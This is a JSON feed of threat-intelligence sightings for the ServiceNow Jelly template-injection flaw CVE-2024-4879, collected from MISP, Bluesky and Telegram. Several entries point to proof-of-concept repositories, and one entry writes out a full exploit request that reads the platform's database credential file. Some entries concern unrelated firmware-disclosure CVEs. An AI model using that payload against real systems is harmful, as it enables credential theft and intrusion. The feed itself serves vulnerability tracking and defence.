{"vulnerability": "CVE-2024-4879", "sightings": [{"uuid": "ddf7f9e8-301a-4fd3-8f52-cadf146751bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-07-29T18:10:03.000000Z"}, {"uuid": "c21142d3-3273-450b-a75b-1203a268098a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/tamosan.bsky.social/post/3lfwacsz2fw2o", "content": "", "creation_timestamp": "2025-01-17T07:07:51.228185Z"}, {"uuid": "dafb1288-c9ff-494f-b50e-524054d237de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lky6uwrfa22x", "content": "", "creation_timestamp": "2025-03-22T16:53:28.815003Z"}, {"uuid": "bf34ade3-1f7e-4c3f-aaa1-45b310a42574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3lkvkvumgpr2k", "content": "", "creation_timestamp": "2025-03-21T15:50:46.504197Z"}, {"uuid": "8ee47692-b6aa-4faf-a7d1-3a7ba03a2210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lkxcdrog3v2p", "content": "", "creation_timestamp": "2025-03-22T08:22:48.597338Z"}, {"uuid": "f03dea7a-12d3-44f7-b93a-0ec42a1d2944", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:56.000000Z"}, {"uuid": "6f82dafb-4fa6-4d55-8e82-68e68b394649", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/infrasecalliance.org/post/3lkthvqwomc26", "content": "", "creation_timestamp": "2025-03-20T19:51:43.117651Z"}, {"uuid": "96b76cb8-a6b8-474f-ad3a-7f2490c95d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/infrasecalliance.org/post/3lkthvqwsjc26", "content": "", "creation_timestamp": "2025-03-20T19:51:43.793213Z"}, {"uuid": "c855a658-98bf-4da2-9d67-908e24b14b0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/infrasecalliance.org/post/3lkthvqwtik26", "content": "", "creation_timestamp": "2025-03-20T19:51:44.476814Z"}, {"uuid": "ea7360fa-f3b7-4cf6-9b69-1d56ae8163da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/infrasecalliance.org/post/3lkthvqwtil26", "content": "", "creation_timestamp": "2025-03-20T19:51:45.243269Z"}, {"uuid": "bdf13c68-7f42-4655-9cbb-d9867f3c47d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lwa7hpi3jx2w", "content": "", "creation_timestamp": "2025-08-12T21:02:28.098770Z"}, {"uuid": "7ef9b2b8-e28c-4481-b5fb-f19a64d464af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://bsky.app/profile/infrasecalliance.org/post/3lkthvqwuht26", "content": "", "creation_timestamp": "2025-03-20T19:51:45.901815Z"}, {"uuid": "67d76b92-5bed-4b09-96ef-affdcd0a2a65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:16.000000Z"}, {"uuid": "cd627bd2-2144-4e4e-87d7-db322ca479bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/0ed650b2-0845-4a5d-8164-a858acafffa8", "content": "", "creation_timestamp": "2024-07-27T20:58:34.478877Z"}, {"uuid": "890c99d0-5ee2-49e3-8416-7e18ad62b727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:33.000000Z"}, {"uuid": "fba1408e-e52c-4ed4-9043-04c7cc8bfa77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8262", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRDL\u7684\u5806\u6ea2\u51fa\u5bfc\u81f4\u7684RCE\nURL\uff1ahttps://github.com/jdusane/CVE-2024-4879\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-14T07:03:24.000000Z"}, {"uuid": "74cb9149-87b1-4ba4-9cdc-cfa5e2f9b82f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7958", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBulk scanning tool for ServiceNow CVE-2024-4879 vulnerability\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-4879\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-12T13:05:22.000000Z"}, {"uuid": "b01ef9ef-88d2-4142-a11b-04f09ca7f2d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7955", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\nURL\uff1ahttps://github.com/Brut-Security/CVE-2024-4879\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-12T10:37:45.000000Z"}, {"uuid": "936114d9-4bbe-4cee-85e7-4c3952501915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-4879", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/79a31a14-ef9e-4e7a-9a2d-4fd1ff149bc0", "content": "", "creation_timestamp": "2026-02-02T12:26:32.863322Z"}, {"uuid": "e5538739-c6e4-48e6-bdec-0d669b7a6bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8105", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2024-4879 & CVE-2024-5217 ServiceNow RCE Scanning Using Nuclei & Shodan Dork to find it.\nURL\uff1ahttps://github.com/cc1a2b/PenHunter\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-07-28T09:42:53.000000Z"}, {"uuid": "cf891948-f6de-49bb-919f-0844a47884c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8103", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2024-4879 & CVE-2024-5217 ServiceNow RCE Scanning Using Nuclei & Shodan Dork to find it.\nURL\uff1ahttps://github.com/Z3r0H0ur666/RCE-Hunter\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-07-28T08:04:53.000000Z"}, {"uuid": "20c6a7b7-8f4c-4345-aeb5-a33384f8f89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8102", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4879 & CVE-2024-5217 ServiceNow RCE Scanning & Shodan Dork to find it.\nURL\uff1ahttps://github.com/NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-28T06:57:10.000000Z"}, {"uuid": "fe123e51-b04b-40d4-900f-438aca0a807b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8373", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aJelly Template Injection Vulnerability in ServiceNow | POC CVE-2024-4879\nURL\uff1ahttps://github.com/fa-rrel/CVE-2024-4879\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-27T03:44:34.000000Z"}, {"uuid": "abc7e595-38cd-461f-acf0-a4721002975c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "exploited", "source": "https://t.me/DarkWebInformer_CVEAlerts/3905", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4879\n\ud83c\udfe2 Vendor: ServiceNow\n\ud83d\udda5\ufe0f Product: Utah, Vancouver, and Washington DC Now\n\ud83d\udd39 Description: ServiceNow Utah, Vancouver, and Washington DC Now releases contain a jelly template injection vulnerability in UI macros. An unauthenticated user could exploit this vulnerability to execute code remotely. \n\ud83d\udccf Published: 2024-07-23T00:00:00Z\n\ud83d\udd17 References:\n1. https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json\n2. https://www.imperva.com/blog/imperva-customers-protected-against-critical-servicenow-vulnerability/\n3. https://www.resecurity.com/blog/article/cve-2024-4879-and-cve-2024-5217-servicenow-rce-exploitation-in-a-global-reconnaissance-campaign\n4. https://fortiguard.fortinet.com/outbreak-alert/servicenow-rce", "creation_timestamp": "2025-02-08T23:21:33.000000Z"}, {"uuid": "e6cd0d76-155c-4051-8dc7-a59845370ac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7995", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for CVE-2024-4879 affecting Vancouver, Washington DC Now and Utah Platform releases\nURL\uff1ahttps://github.com/Praison001/CVE-2024-4879-ServiceNow\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-16T04:35:18.000000Z"}, {"uuid": "fa7e6876-d8ed-42be-b51f-6172817a0e30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48798", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8481", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-48798\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue in Hubble Connected (com.hubbleconnected.vervelife) 2.00.81 allows a remote attacker to obtain sensitive information via the firmware update process.\n\ud83d\udccf Published: 2024-10-14T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-24T17:13:57.076Z\n\ud83d\udd17 References:\n1. https://hubbleconnected.com/\n2. https://github.com/HankJames/Vul-Reports/blob/main/FirmwareLeakage/com.hubbleconnected.vervelife/com.hubbleconnected.vervelife.md", "creation_timestamp": "2025-03-24T17:23:44.000000Z"}, {"uuid": "c825cd9c-4f03-40cd-9a7c-6cf526fd0cd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48797", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8666", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-48797\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue in PCS Engineering Preston Cinema (com.prestoncinema.app) 0.2.0 allows a remote attacker to obtain sensitive information via the firmware update process.\n\ud83d\udccf Published: 2024-10-14T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-25T14:12:52.608Z\n\ud83d\udd17 References:\n1. http://www.pcsengineering.net/\n2. https://github.com/HankJames/Vul-Reports/blob/main/FirmwareLeakage/com.prestoncinema.app/com.prestoncinema.app.md", "creation_timestamp": "2025-03-25T14:24:20.000000Z"}, {"uuid": "080d3f7e-79c7-4f68-aae7-5d8adc961256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "Telegram/1LyGM2ds6KCu885cqOKHCl_bZq2Y_owcnhNMrYkxoYAnLw", "content": "", "creation_timestamp": "2024-08-28T17:16:11.000000Z"}, {"uuid": "8f68d29c-4620-4bd2-a30f-04deb23e248a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18021", "content": "https://github.com/fa-rrel/CVE-2024-4879\n\nJelly Template Injection Vulnerability in ServiceNow | POC CVE-2024-4879\n\nFOFA : \"server : servicenow\"\n#github #exploit", "creation_timestamp": "2024-08-28T17:17:52.000000Z"}, {"uuid": "af50da81-fcf4-4992-bc52-9e5b604a7cfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "Telegram/41AOwW-HVfveJGnWTCUGJmCb5QTVwo4WGVTDiWBY6ulqpQ", "content": "", "creation_timestamp": "2024-08-01T20:58:08.000000Z"}, {"uuid": "c568988c-796b-43e1-bc98-839a965dda15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/233", "content": "#exploit\n1. CVE-2024-4879:\nJelly Template Injection Vulnerability in ServiceNow\nhttps://blog.redteam-pentesting.de/2024/moodle-rce\n\n2. CVE-2024-5932:\nWordPress GiveWP Donation/Fundraising Platform 3.14.1 Code Execution\nhttps://packetstormsecurity.com/files/180463/WordPress-GiveWP-Donation-Fundraising-Platform-3.14.1-Code-Execution.html", "creation_timestamp": "2024-08-30T18:56:36.000000Z"}, {"uuid": "18e3055b-c7a3-458b-9a55-fa376ebbf635", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48790", "type": "seen", "source": "https://t.me/cvedetector/7847", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48790 - ILIFE com.ilife.home.global Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-48790 \nPublished : Oct. 14, 2024, 6:15 p.m. | 30\u00a0minutes ago \nDescription : An issue in ILIFE com.ilife.home.global 1.8.7 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:51:44.000000Z"}, {"uuid": "e1ee4471-252c-44c1-ab6f-312b826556ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48793", "type": "seen", "source": "https://t.me/cvedetector/7845", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48793 - BMW INATRONIC Firmware Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-48793 \nPublished : Oct. 14, 2024, 6:15 p.m. | 30\u00a0minutes ago \nDescription : An issue in INATRONIC com.inatronic.bmw 2.7.1 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:51:43.000000Z"}, {"uuid": "88d3ed49-2e1b-4d89-8659-32631feb8d04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48791", "type": "seen", "source": "https://t.me/cvedetector/7848", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48791 - Starvedia Plug n Play Camera Firmware Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-48791 \nPublished : Oct. 14, 2024, 6:15 p.m. | 30\u00a0minutes ago \nDescription : An issue in Plug n Play Camera com.starvedia.mCamView.zwave 5.5.1 allows a remote attacker to obtain sensitive information via the firmware update process \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:51:45.000000Z"}, {"uuid": "00c9da2e-025a-4580-b8fd-1083d8c00319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48797", "type": "seen", "source": "https://t.me/cvedetector/7832", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48797 - Preston Cinema Firmware Update Information Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-48797 \nPublished : Oct. 14, 2024, 5:15 p.m. | 38\u00a0minutes ago \nDescription : An issue in PCS Engineering Preston Cinema (com.prestoncinema.app) 0.2.0 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:01:18.000000Z"}, {"uuid": "ca6e129c-636f-4226-8371-fab79c6a4db4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48796", "type": "seen", "source": "https://t.me/cvedetector/7831", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48796 - EQUES Plug Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-48796 \nPublished : Oct. 14, 2024, 5:15 p.m. | 38\u00a0minutes ago \nDescription : An issue in EQUES com.eques.plug 1.0.1 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:01:14.000000Z"}, {"uuid": "546e5803-4320-4666-a1e0-7bfe3a6a81ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48799", "type": "seen", "source": "https://t.me/cvedetector/7834", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48799 - LOREX TECHNOLOGY INC com.lorexcorp.lorexping Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-48799 \nPublished : Oct. 14, 2024, 5:15 p.m. | 38\u00a0minutes ago \nDescription : An issue in LOREX TECHNOLOGY INC com.lorexcorp.lorexping 1.4.22 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:01:20.000000Z"}, {"uuid": "459d0bff-1599-4688-80a4-529a66067b8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48798", "type": "seen", "source": "https://t.me/cvedetector/7833", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48798 - Hubble Connected Firmware Update Information Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-48798 \nPublished : Oct. 14, 2024, 5:15 p.m. | 38\u00a0minutes ago \nDescription : An issue in Hubble Connected (com.hubbleconnected.vervelife) 2.00.81 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:01:19.000000Z"}, {"uuid": "94e2515f-bc18-4dd7-8236-aa0298c90f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48795", "type": "seen", "source": "https://t.me/cvedetector/7850", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48795 - Creative Labs Pte Ltd XFiconnect Information Disclosure\", \n  \"Content\": \"CVE ID : CVE-2024-48795 \nPublished : Oct. 14, 2024, 6:15 p.m. | 30\u00a0minutes ago \nDescription : An issue in Creative Labs Pte Ltd com.creative.apps.xficonnect 2.00.02 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:51:50.000000Z"}, {"uuid": "47556410-4c1f-4db0-ba94-06b60bd15a06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-48792", "type": "seen", "source": "https://t.me/cvedetector/7849", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-48792 - Hideez Firmware Update Information Disclosure Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-48792 \nPublished : Oct. 14, 2024, 6:15 p.m. | 30\u00a0minutes ago \nDescription : An issue in Hideez com.hideez 2.7.8.3 allows a remote attacker to obtain sensitive information via the firmware update process. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-14T20:51:49.000000Z"}, {"uuid": "807b5e1c-03ec-41d3-891e-1b7f40d6d45f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1854", "content": "https://github.com/fa-rrel/CVE-2024-4879\n\nJelly Template Injection Vulnerability in ServiceNow | POC CVE-2024-4879\n\nFOFA : \"server : servicenow\"\n#github #exploit", "creation_timestamp": "2024-08-28T17:17:52.000000Z"}, {"uuid": "e75155b0-95f0-46eb-91f8-295cf9e02593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/13055", "content": "cve-2024-4879\n\nGET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-07-14T17:12:40.000000Z"}, {"uuid": "a23e463d-3077-47dd-99d5-a8c2da397e89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1708", "content": "\ud83d\udea8PoC RELEASED\ud83d\udea8CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow\n\nGitHub: https://github.com/Brut-Security/CVE-2024-4879\n\nhttps://darkwebinformer.com/poc-released-for-cve-2024-4879-jelly-template-injection-vulnerability-in-servicenow/", "creation_timestamp": "2024-07-12T20:49:48.000000Z"}, {"uuid": "7efc4839-054f-42a5-941b-bf423e3171e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4879", "type": "seen", "source": "https://t.me/cvedetector/554", "content": "{\n  \"Source\": \"CVE FEED\",\n  